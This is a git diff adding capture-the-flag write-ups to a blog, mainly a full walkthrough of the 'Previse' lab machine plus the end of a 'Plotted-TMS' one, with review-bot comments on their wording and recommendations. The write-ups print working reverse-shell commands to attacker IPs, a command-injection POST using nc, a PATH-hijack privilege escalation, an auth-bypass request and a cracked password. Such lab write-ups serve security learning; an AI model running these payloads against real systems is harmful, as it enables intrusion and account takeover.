So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as `plot_admin`. + +To do this I use the following commands: + + +```bash +mv backup.sh tmp +touch backup.sh +echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh +chmod +x backup.sh +``` +![](img/image-9.webp) + +I now have a reverse shell with the user `plot_admin` and I can get the first flag. + +## Privilege escalation + +I start by listing the SUID files with the following command: + + +```bash +find / -perm -u=s -type f 2>/dev/null +``` +I found a command not very common: [doas](https://man.openbsd.org/doas). This command is an alternative to the `sudo` command. After some research I find on this [site](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that the config file of this command is at the following address: `/etc/doas.conf`. + +![](img/image-10.webp) + +I find that my user can execute the `openssl` command with admin rights. So I'm looking on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for exploits related to this command. + +I find that it is possible to write in files, so I will be able to add to ssh key in the `authorized_keys` file and then connect via SSH to the root account. + +To do this I use the following commands: + + +```bash +FILE=/root/.ssh/authorized_keys +echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE" +``` +![](img/image-11.webp) + +I now have a shell `root` shell and can retrieve the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Fix the site code to avoid SQL injections ([OWASP SQL Injection](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)) +- Implement code detection in the admin panel image uploads +- Store CRON scripts in a folder accessible only by the author +- Do not allow root rights on commands that do not require it 
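Review bot: The Recommendations list at the end of writeup-plotted-tms-thm/index.md is too vague to act on for the findings it is meant to close. "Implement code detection in the admin panel image uploads" does not say what to check. Since the text shows the uploaded PHP file being served and executed from `/management/uploads/`, name the controls: validate uploads against an allow-list of image formats and make sure the uploads directory cannot execute scripts. "Store CRON scripts in a folder accessible only by the author" should state that the problem was write access to `/var/www/scripts` for `www-data`, and the last item should point at the `openssl` rule in `/etc/doas.conf`. Smaller points: "I now have a shell `root` shell" repeats a word, "add to ssh key" should read "add an SSH key", and the fences holding the login string and the URL are tagged `bash` although neither is shell.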
diff --git a/content/writeup-ctf/writeup-previse-htb/featured.png b/content/writeup-ctf/writeup-previse-htb/featured.png new file mode 100644 index 0000000..55ff4ed --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c7352dd4b88cafda0263d83a267b3c8fcabe868bb3b119ddaa9929d37b2154a +size 402314 diff --git a/content/writeup-ctf/writeup-previse-htb/featured.webp b/content/writeup-ctf/writeup-previse-htb/featured.webp new file mode 100644 index 0000000..527a5ce --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edf6dba08a8c6f1f848d68b90929352c1c5d5c73f4e5eba12c3801ed592035a9 +size 33118 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-1.png b/content/writeup-ctf/writeup-previse-htb/img/image-1.png new file mode 100644 index 0000000..0a660a4 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8b5f2dcb01d7a68a8c9cd1164a23b23440e99041982a9a294706a3cdf6a92c4 +size 36260 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-1.webp b/content/writeup-ctf/writeup-previse-htb/img/image-1.webp new file mode 100644 index 0000000..b159b67 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16184b614c14e29e189e3dcc95d87ffc39726b433c76fb1d23b462ebfb6c6e72 +size 31370 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-10.png b/content/writeup-ctf/writeup-previse-htb/img/image-10.png new file mode 100644 index 0000000..427430b --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f926dee60d601f5ba365c401d760489b80cd05b9620942161cd88f76c11524c1 +size 26805 
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-10.webp b/content/writeup-ctf/writeup-previse-htb/img/image-10.webp new file mode 100644 index 0000000..5413102 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5618c4cf4deda43e0cf7db49354c15aa5c3e733f80da30136d4ba64c5fc3ae0 +size 32232 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-11.png b/content/writeup-ctf/writeup-previse-htb/img/image-11.png new file mode 100644 index 0000000..908b07a --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d7f9bd33e5f2e407ca27f7423d3ee0a83feefb107f8539b6a6a44eefddd8b11 +size 16351 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-11.webp b/content/writeup-ctf/writeup-previse-htb/img/image-11.webp new file mode 100644 index 0000000..1a207a1 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01b349989d1cf7511d36086e6558d193ae45791d6a130d26702a27d3464c2f54 +size 14464 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-12.png b/content/writeup-ctf/writeup-previse-htb/img/image-12.png new file mode 100644 index 0000000..e353f45 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44cd015c0ca870ba4585094175d606117b6f619d21dcced3f82042a33c930abe +size 78309 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-12.webp b/content/writeup-ctf/writeup-previse-htb/img/image-12.webp new file mode 100644 index 0000000..eb44342 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-12.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d7b1dc6dc600f9810407cbd164e5d1cd67abbae8da1b19ed0cbd4a8391d4572 +size 63604 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-13.png b/content/writeup-ctf/writeup-previse-htb/img/image-13.png new file mode 100644 index 0000000..a0d017a --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:327652e47d079e1afbfe3f1e0696a45afdedeccb8bea359322c3c8d9a668e651 +size 27456 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-13.webp b/content/writeup-ctf/writeup-previse-htb/img/image-13.webp new file mode 100644 index 0000000..6422490 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9998eb9c211eb127686cf5a80226444fc980f5cc46090061486612507ba41352 +size 29516 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-14.png b/content/writeup-ctf/writeup-previse-htb/img/image-14.png new file mode 100644 index 0000000..56b8eb5 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff77287e44545a054872984ffd8fd8ab2078456f753d71bd1c38af04739a0df8 +size 19139 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-14.webp b/content/writeup-ctf/writeup-previse-htb/img/image-14.webp new file mode 100644 index 0000000..0b09cb6 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6607ca7d38c1aed95efb3607d76272b438e9c9cfe8eaa419fec2a2e6ee00f9f0 +size 18876 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-2.png b/content/writeup-ctf/writeup-previse-htb/img/image-2.png new file mode 100644 index 0000000..6b89e53 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-2.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c42151a19dccfbeb83b0abfae8bb3edf8d577a8f9968793d099b078dbb1c9cb5 +size 33756 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-2.webp b/content/writeup-ctf/writeup-previse-htb/img/image-2.webp new file mode 100644 index 0000000..19df5ce --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97a395f28f162d9359f3e1d1fefda154f33bc5ceb74776ef68dacc584bbc8063 +size 19572 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-3.png b/content/writeup-ctf/writeup-previse-htb/img/image-3.png new file mode 100644 index 0000000..32f06aa --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f49389d82f4296e8755fba7a71d168b7a1cdaa9fbf68a9ed8406480a66df8d5d +size 117782 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-3.webp b/content/writeup-ctf/writeup-previse-htb/img/image-3.webp new file mode 100644 index 0000000..d6f399b --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2be5109bb55d9184003298dab9ffb4200c5d8114f515824194bf33e3e72e777 +size 99392 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-4.png b/content/writeup-ctf/writeup-previse-htb/img/image-4.png new file mode 100644 index 0000000..13d8806 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9e7c0dad2e6dde8c5df0931dcc4d5a3d6e1c6c3775802a9b11d1c1c07cbf1fc +size 11627 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-4.webp b/content/writeup-ctf/writeup-previse-htb/img/image-4.webp new file mode 100644 index 0000000..9a3db2c --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-4.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b688e037569b5e46e8038732a6e3130b231b0dbd2c6273e7e5c80eddfb0224b +size 10488 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-5.png b/content/writeup-ctf/writeup-previse-htb/img/image-5.png new file mode 100644 index 0000000..dc04446 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca6f99bb5a1b408a66ea5cf9247b2f57b5f8bfe49bdc0993a3bdce008708fbbf +size 42556 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-5.webp b/content/writeup-ctf/writeup-previse-htb/img/image-5.webp new file mode 100644 index 0000000..cb190dc --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:129bff72546e011542b692ff1516d624ea404ef609d3a3eaaca8796abad33ca9 +size 45570 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-6.png b/content/writeup-ctf/writeup-previse-htb/img/image-6.png new file mode 100644 index 0000000..e60e26d --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b14c0cd543f8c4de7ad907efcd4ff1f5bc55aadbc1ce592ea72881b13ae1a61 +size 18656 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-6.webp b/content/writeup-ctf/writeup-previse-htb/img/image-6.webp new file mode 100644 index 0000000..7e20983 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80130de65298ef6fddafa10e3486e9e47287d8f4bf051dc8924dbe3478f7b393 +size 11796 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-7.png b/content/writeup-ctf/writeup-previse-htb/img/image-7.png new file mode 100644 index 0000000..1747a6e --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-7.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a33447cbe338528ad40490ae58ff450bf3ee733fd1d069ee90fa348ba65ecdd2 +size 22811 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-7.webp b/content/writeup-ctf/writeup-previse-htb/img/image-7.webp new file mode 100644 index 0000000..4343609 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11a0f3f9621782c271b6f76ba7f372f8654c0d101b0fe14587cb581b6f18fedd +size 14008 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-8.png b/content/writeup-ctf/writeup-previse-htb/img/image-8.png new file mode 100644 index 0000000..fa9c9bd --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f3247775533cbd65c78c6ec6e3cdd0fb0d2146cd7afb70201f9e7d70f654fd8 +size 76861 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-8.webp b/content/writeup-ctf/writeup-previse-htb/img/image-8.webp new file mode 100644 index 0000000..f6fc3a4 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dd4c594eb011029d8b001b966895c9647b99450e0e18af3c2149fdbcfb7e47a +size 63944 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-9.png b/content/writeup-ctf/writeup-previse-htb/img/image-9.png new file mode 100644 index 0000000..46a235d --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f6e0d76ed83acfe9ab45c680052b9012e17ab12767b19e7163d62063f9acdf3 +size 11229 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-9.webp b/content/writeup-ctf/writeup-previse-htb/img/image-9.webp new file mode 100644 index 0000000..f965724 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-9.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:296b7d4b3af55af2e1146448c90fbe0a9550f46784ea37a90d3122190fe6a251 +size 10806 diff --git a/content/writeup-ctf/writeup-previse-htb/index.md b/content/writeup-ctf/writeup-previse-htb/index.md new file mode 100644 index 0000000..4b4cd13 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/index.md 
@@ -0,0 +1,247 @@ +--- +title: "Writeup - Previse (HTB)" +date: 2022-03-23 +slug: "writeup-previse-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Previse](https://app.hackthebox.com/machines/Previse) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.104 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.49) + +![](img/image-2.webp) + +## Exploit + +First of all, I start by listing the pages of the site with `ffuf`. After a first execution of the command, I notice that there are few pages, I run the command again with a filter to find particular `.php` pages. + +![](img/image-3.webp) + +There are a lot of pages and one in particular that catches my attention : `nav.php`. + +![](img/image-4.webp) + +One page in the list is particularly interesting : `CREATE ACCOUNT`. Which refers to `accounts.php`. The only problem is that if I try to go on the page with a browser I am redirected to `login.php` immediately. So I make a `curl` request to try to see the content of the account page. + +![](img/image-5.webp) + +On this page we find a form to create an account. Since it is a simple redirection, it is normally possible to make a direct request with the form without being impacted by the redirection to `login.php`. 
To do so, create the following request with burp : + + +```bash +POST /accounts.php HTTP/1.1 +Host: 10.10.11.104 +Content-Length: 46 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.10.11.104 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://10.10.11.104/accounts.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=qmeps94op0toeahb44u0qh6eds +Connection: close + +username=azerty&password=azerty&confirm=azerty + +``` +I now have an account and can connect to the web interface. + +![](img/image-6.webp) + +On this web interface, we find a certain number of information, in particular a page to download logs : `file_logs.php`. But also a page to upload files : `files.php`. + + +```bash +time user fileID +1622482496 m4lwhere 4 +1622485614 m4lwhere 4 +1622486215 m4lwhere 4 +1622486218 m4lwhere 1 +1622486221 m4lwhere 1 +1622678056 m4lwhere 5 +1622678059 m4lwhere 6 +1622679247 m4lwhere 1 +1622680894 m4lwhere 5 +1622708567 m4lwhere 4 +1622708573 m4lwhere 4 +1622708579 m4lwhere 5 +1622710159 m4lwhere 4 +1622712633 m4lwhere 4 +1622715674 m4lwhere 24 +1622715842 m4lwhere 23 +1623197471 m4lwhere 25 +1623200269 m4lwhere 25 +1623236411 m4lwhere 23 +1623236571 m4lwhere 26 +1623238675 m4lwhere 23 +1623238684 m4lwhere 23 +1623978778 m4lwhere 32 +``` + +[](img/image-7.webp) + +I find that we have the possibility to download a backup of the site files. I download the archive and find a `config.php` file in which we find the credentials of the mysql database. + + +```bash + +``` +I also find in the `logs.php` file that the page executes a shell command when we make a request on this same page. 
+ +![](img/image-8.webp) + +So I will be able to inject a command during a request and create a reverse shell. To do this I create the following request: + + +```bash +POST /logs.php HTTP/1.1 +Host: 10.10.11.104 +Content-Length: 44 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.10.11.104 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://10.10.11.104/file_logs.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=qmeps94op0toeahb44u0qh6eds +Connection: close + +delim=comma; nc 10.10.16.3 1234 -e /bin/bash +``` +![](img/image-9.webp) + +I now have a reverse shell as `www-data`. I use credentials to connect to the mysql database: + +![](img/image-10.webp) + +I enter in the `previse` database, then I list the tables : + +![](img/image-11.webp) + +The  `accounts` table is interesting, I extract the data with the following command: + + +```bash +mysql> SELECT * from accounts; +SELECT * from accounts; ++----+----------+------------------------------------+---------------------+ +| id | username | password | created_at | ++----+----------+------------------------------------+---------------------+ +| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 | +| 2 | azerty | $1$🧂llol$Vxo8V803JRfho0nQ/u2/T0 | 2022-03-21 10:43:49 | ++----+----------+------------------------------------+---------------------+ +2 rows in set (0.00 sec) +``` +We find the hash of the user `m4lwhere`. We will use hashcat and rockyou to crack the hash. To do this I use the following command: + + +```bash +hashcat.exe -m 500 -a 0 .\hash.txt .\rockyou.txt +hashcat (v6.2.5) starting +[...] 
+Hashes: 1 digests; 1 unique digests, 1 unique salts +Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates +Rules: 1 + +Optimizers applied: +* Zero-Byte +* Single-Hash +* Single-Salt + +[...] + +Dictionary cache built: +* Filename..: .\rockyou.txt +* Passwords.: 14344392 +* Bytes.....: 139921507 +* Keyspace..: 14344385 +* Runtime...: 0 secs + +$1$­ƒºéllol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235! +[...] +``` + +{{< alert icon="circle-info" >}} +To save time I switched to Windows to take advantage of the power of my GPU. Depending on your configuration, it can take more or less time. +{{< /alert >}} + +Ok we find that the password of this user is `ilovecody112235!`. I connect to the user with SSH : + +![](img/image-12.webp) + +I now have a shell with the user `m4lwhere` and I get the first flag. + +## Privilege escalation + +At first I check if the user has SUDO authorization on some order: + + +```bash +m4lwhere@previse:~$ sudo -l +User m4lwhere may run the following commands on previse: + (root) /opt/scripts/access_backup.sh +``` +The user can run the script `access_backup.sh` with root privileges. Let's see what this script does: + +![](img/image-13.webp) + +This script is quite simple, it creates backups of Apache logs. Interestingly, the script does not use the absolute path of the Gzip program. So we will be able to manipulate the PATH variable so that the script uses an alternative version that we will create. + +So I create a `gzip` file in the `/tmp` folder with the following content: + + +```bash +#!/bin/bash + +/bin/bash -i >& /dev/tcp/10.10.14.17/1234 0>&1 +``` +I then add the execution rights, and I add `/tmp` in the PATH variable. I then execute the script with sudo. + + +```bash +chmod +x /tmp/gzip +export PATH="/tmp:$PATH" +sudo /opt/scripts/access_backup.sh +``` +![](img/image-14.webp) + +I now have a root shell and can retrieve the last flag. 
+ +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not use shell commands in pages accessible by everyone +- Parse form inputs correctly to avoid injection +- Do not leave credentials in public backups +- Use absolute path in scripts using external programs to avoid PATH manipulations diff --git a/content/writeup-ctf/writeup-road-thm/featured.png b/content/writeup-ctf/writeup-road-thm/featured.png new file mode 100644 index 0000000..7a73654 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86ce8520295c56dd55724741e9c39682af756a81637204b985f8130ca12fed28 +size 645512 diff --git a/content/writeup-ctf/writeup-road-thm/featured.webp b/content/writeup-ctf/writeup-road-thm/featured.webp new file mode 100644 index 0000000..545d1c1 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3d690faf8ea41dd767ad8150283b8f3a93dd2c6bb2677d4914bffc06cb86ff9 +size 702586 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-1.png b/content/writeup-ctf/writeup-road-thm/img/image-1.png new file mode 100644 index 0000000..d81169b --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e79f559f6b7a53dee5b1044b5307af9d355365db4012fbd8ca2e946d5019db14 +size 35044 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-1.webp b/content/writeup-ctf/writeup-road-thm/img/image-1.webp new file mode 100644 index 0000000..83d0819 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:769370f95c5086abfce459d84c3b648574b29f08afbfd3be08e1bec9cf5ee5ad +size 31926 
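Review bot: In writeup-previse-htb/index.md the line `[](img/image-7.webp)` is missing its leading `!`, so it renders as an empty link instead of the screenshot, and the fenced block after the `config.php` sentence is empty; either drop that fence or show the relevant lines with the secrets redacted. The salt also appears in two encodings (`$1$🧂llol$` in the table, mojibake in the hashcat output), the listener address changes from 10.10.16.3 to 10.10.14.17 between the two reverse shells without comment, and the raw HTTP requests are fenced as `bash`. The Recommendations list leaves two findings open: `accounts.php` served its form and accepted the POST from a client that was not logged in, and the `accounts` table held hashes that hashcat mode 500 recovered with rockyou. Add items for enforcing authentication before any page output and for moving to a stronger password hash.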
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-10.png b/content/writeup-ctf/writeup-road-thm/img/image-10.png new file mode 100644 index 0000000..a55a9fd --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71d801190b95d19988e671eb3eac39ca28b286d820f051e7f6a27e390186dcef +size 9403 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-10.webp b/content/writeup-ctf/writeup-road-thm/img/image-10.webp new file mode 100644 index 0000000..6954d07 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fe450d3c8a9ac426916119f91bba98294bdbdbbbf3563ab3310a8254e2e2cb9 +size 6742 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-11.png b/content/writeup-ctf/writeup-road-thm/img/image-11.png new file mode 100644 index 0000000..e01c65a --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b61fdf4b7ce2171d1cdbd6121cbe40ea94c1d3f90161a746e20f679770aba97 +size 29002 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-11.webp b/content/writeup-ctf/writeup-road-thm/img/image-11.webp new file mode 100644 index 0000000..ec6cb70 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc7ff49a84dbdfa4c8a1d1fc04c5d6ec8299965e33fabb867fb134a812a7a394 +size 27566 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-12.png b/content/writeup-ctf/writeup-road-thm/img/image-12.png new file mode 100644 index 0000000..009a4ef --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e94995c2162500fe3ed70c35e7f27e62beca2fcdf2f888dc0d4cfaf8ae44ee4 +size 83653 
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-12.webp b/content/writeup-ctf/writeup-road-thm/img/image-12.webp new file mode 100644 index 0000000..753e823 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5a289fbf74435eff97d12c8a393016d22cc066c7391ae294f5ba325deb3a715 +size 91814 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-13.png b/content/writeup-ctf/writeup-road-thm/img/image-13.png new file mode 100644 index 0000000..0d8ecce --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbbdedda7dfea4245580daade192eade96839189be45d9ad2e62cff555720fc8 +size 3532 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-13.webp b/content/writeup-ctf/writeup-road-thm/img/image-13.webp new file mode 100644 index 0000000..3d871b7 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d723461c60b63bccd696290de918ba4122f6726d96384fe18e203270c7f6ac5 +size 4754 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-14.png b/content/writeup-ctf/writeup-road-thm/img/image-14.png new file mode 100644 index 0000000..6a0837d --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bb43c0d39dbb3f88664af3dc6ef192bac7c4a7c493285aef1e949629c362e42 +size 33252 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-14.webp b/content/writeup-ctf/writeup-road-thm/img/image-14.webp new file mode 100644 index 0000000..fe1dff9 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65691d526aaf7d5e7606cc3cfea646265db9fc5d6c7faa3349bc71c356cc933e +size 30066 
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-15.png b/content/writeup-ctf/writeup-road-thm/img/image-15.png new file mode 100644 index 0000000..0c90137 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0ef517b7d4bccf433ef5be1b27ef166ac477f6c5cbd6a9dc52a5511b9fcd8b7 +size 18332 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-15.webp b/content/writeup-ctf/writeup-road-thm/img/image-15.webp new file mode 100644 index 0000000..9e521e0 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f93077b9ed1d1a671fe86a5f134fe36fbd84b6b18eaecbf9029e53c6c1d17990 +size 21202 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-16.png b/content/writeup-ctf/writeup-road-thm/img/image-16.png new file mode 100644 index 0000000..0c55dde --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c188d2fe85b6c1f5f78cdb322231f8dde0615cc3e7753643d829f8534ece2cf6 +size 12383 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-16.webp b/content/writeup-ctf/writeup-road-thm/img/image-16.webp new file mode 100644 index 0000000..4369119 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-16.webp @@ -0,0 +1,3 @@ +version 